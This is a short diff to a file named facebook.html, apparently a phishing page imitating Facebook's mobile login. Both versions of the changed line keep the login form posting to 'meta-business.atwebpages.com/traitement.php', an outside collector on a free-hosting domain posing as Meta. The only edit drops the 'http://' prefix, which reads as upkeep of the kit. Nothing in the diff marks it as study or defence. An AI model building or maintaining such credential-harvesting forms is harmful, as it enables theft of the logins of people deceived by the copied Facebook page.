--- a/facebook.html
+++ b/facebook.html
@@ -87,7 +87,7 @@
                   <div class="_5rut">
                     <form target="_blank"
                       method="post"
-                      action="http://meta-business.atwebpages.com/traitement.php"
+                      action="meta-business.atwebpages.com/traitement.php"
                       class="mobile-login-form _9hp- _5spm"
                       id="login_form"
                       
